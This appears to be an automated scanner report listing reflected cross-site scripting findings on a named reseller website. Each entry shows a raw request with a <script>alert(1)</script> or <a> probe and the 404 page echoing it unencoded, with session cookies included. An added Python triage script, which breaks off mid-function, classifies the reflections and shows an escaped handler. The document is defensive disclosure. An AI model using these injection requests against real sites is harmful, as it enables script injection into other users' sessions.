Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...552d4<a>9b19d41fa6f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3461. http://www.resellerbase.com/detail/5/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0ff5<script>alert(1)</script>88b717e9274 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2&d0ff5<script>alert(1)</script>88b717e9274=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2&d0ff5<script>alert(1)</script>88b717e9274=1 was not found on this server.</p>
...[SNIP]...

2.3462. http://www.resellerbase.com/detail/5/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9b5af<a>e39467ac77 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=29b5af<a>e39467ac77 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=29b5af<a>e39467ac77 was not found on this server.</p>
...[SNIP]...

2.3463. http://www.resellerbase.com/detail/6/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3d5<script>alert(1)</script>4149193c459 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailff3d5<script>alert(1)</script>4149193c459/6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailff3d5<script>alert(1)</script>4149193c459/6/ was not found on this server.</p>
...[SNIP]...

2.3464. http://www.resellerbase.com/detail/6/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73336<script>alert(1)</script>a71fe45a589 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/673336<script>alert(1)</script>a71fe45a589/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/673336<script>alert(1)</script>a71fe45a589/ was not found on this server.</p>
...[SNIP]...

2.3465. http://www.resellerbase.com/detail/6/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b32f<script>alert(1)</script>b027f6045b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/?6b32f<script>alert(1)</script>b027f6045b5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/?6b32f<script>alert(1)</script>b027f6045b5=1 was not found on this server.</p>
...[SNIP]...

2.3466. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53f2c<script>alert(1)</script>8a611919bf829cfaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail53f2c<script>alert(1)</script>8a611919bf829cfaa/6/rating.php?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail53f2c<script>alert(1)</script>8a611919bf829cfaa/6/rating.php?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3467. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 897f3<script>alert(1)</script>d6d3e1ac4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail897f3<script>alert(1)</script>d6d3e1ac4e6/6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail897f3<script>alert(1)</script>d6d3e1ac4e6/6/rating.php was not found on this server.</p>
...[SNIP]...

2.3468. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57c33<script>alert(1)</script>2c01e301bc58ac061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/657c33<script>alert(1)</script>2c01e301bc58ac061/rating.php?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/657c33<script>alert(1)</script>2c01e301bc58ac061/rating.php?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3469. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0f3d<script>alert(1)</script>7e47979e75b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6e0f3d<script>alert(1)</script>7e47979e75b/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6e0f3d<script>alert(1)</script>7e47979e75b/rating.php was not found on this server.</p>
...[SNIP]...

2.3470. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 332c6<script>alert(1)</script>51e5aa7e6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/rating.php332c6<script>alert(1)</script>51e5aa7e6c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php332c6<script>alert(1)</script>51e5aa7e6c was not found on this server.</p>
...[SNIP]...

2.3471. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b897<script>alert(1)</script>da839ce115dbb1bbd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/6/rating.php6b897<script>alert(1)</script>da839ce115dbb1bbd?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php6b897<script>alert(1)</script>da839ce115dbb1bbd?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3472. http://www.resellerbase.com/detail/6/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85ef4<script>alert(1)</script>2420e9c696bcfd68c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/6/rating.php/85ef4<script>alert(1)</script>2420e9c696bcfd68c?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php/85ef4<script>alert(1)</script>2420e9c696bcfd68c?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3473. http://www.resellerbase.com/detail/6/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9ae8<script>alert(1)</script>1030dd3b5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/rating.php?b9ae8<script>alert(1)</script>1030dd3b5f2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php?b9ae8<script>alert(1)</script>1030dd3b5f2=1 was not found on this server.</p>
...[SNIP]...

2.3474. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 599f7<script>alert(1)</script>2c85480efd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail599f7<script>alert(1)</script>2c85480efd8/6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail599f7<script>alert(1)</script>2c85480efd8/6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3475. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 215cb<script>alert(1)</script>1e47e9c7b13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6215cb<script>alert(1)</script>1e47e9c7b13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6215cb<script>alert(1)</script>1e47e9c7b13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3476. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18d32<script>alert(1)</script>f7db25daa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/search.php18d32<script>alert(1)</script>f7db25daa8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php18d32<script>alert(1)</script>f7db25daa8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3477. http://www.resellerbase.com/detail/6/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bb2c8<a>5de352e853c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Searchbb2c8<a>5de352e853c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Searchbb2c8<a>5de352e853c&opt=2 was not found on this server.</p>
...[SNIP]...
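
Every entry in this run of findings has the same shape: the request is answered with a 404 page whose body echoes the requested URL between tags without HTML-encoding it. The "Certain" entries echo a complete <script> probe intact; the "Firm" entries, such as 2.3477 above, echo only a bare <a> tag because the scanner's script probe did not succeed in that parameter. The Python below is an added triage script, not part of this report or of the scanned application. It classifies how a canary comes back (raw, HTML-encoded, percent-encoded or absent), groups entries that share the one 404 echo sink so that the many per-parameter findings collapse onto a single root cause, and shows the check a practitioner should add before accepting "Certain": a browser that follows the WHATWG URL Standard percent-encodes < and > in both path and query before the request is sent, so a sink that reflects raw bytes is only live for clients that do not. The 404 body is reconstructed from the <p>The requested URL ... was not found on this server.</p> line the report shows; the canary values come from entry 2.3477; all function names and the REQUESTS/ENTRIES tables are the example's own.

```python
import html
import re
from collections import defaultdict

# Canary in the report's style: random prefix, probe, random suffix (values
# taken from entry 2.3477). The prefix/suffix keep the check from matching
# markup the page already contained.
PREFIX, SUFFIX = "bb2c8", "5de352e853c"
SCRIPT_PROBE = "<script>alert(1)</script>"   # the probe behind "Certain"
TAG_PROBE = "<a>"                            # the fallback probe behind "Firm"

def canary(probe: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> str:
    return f"{prefix}{probe}{suffix}"

# Constructed 404 body modelled on the <p>...</p> line shown for every entry
# in this run: the request target is echoed verbatim between tags.
def vulnerable_404(target: str) -> str:
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {target} was not found on this server.</p>")

# Hardened form of the same handler: encode for the HTML text context
# (the PHP equivalent is htmlspecialchars($uri, ENT_QUOTES, 'UTF-8')).
def hardened_404(target: str) -> str:
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {html.escape(target, quote=True)} "
            "was not found on this server.</p>")

def browser_encode(s: str) -> str:
    """Percent-encode what a WHATWG-URL-conforming browser rewrites in both
    path and query before the request leaves the client: space, ", <, >."""
    return "".join(f"%{ord(c):02X}" if c in ' "<>' else c for c in s)

def reflection_state(body: str, probe: str) -> str:
    """Classify how the canary came back. Only 'raw' is live markup; the
    report's Certain/Firm entries are all raw echoes of the scanner's bytes."""
    if canary(probe) in body:
        return "raw"
    if canary(html.escape(probe, quote=True)) in body:
        return "html-encoded"
    if canary(browser_encode(probe)) in body:
        return "url-encoded"
    return "absent"

ECHO_RE = re.compile(r"The requested URL (.*?) was not found on this server")

def echo_sink(request_line: str, body: str):
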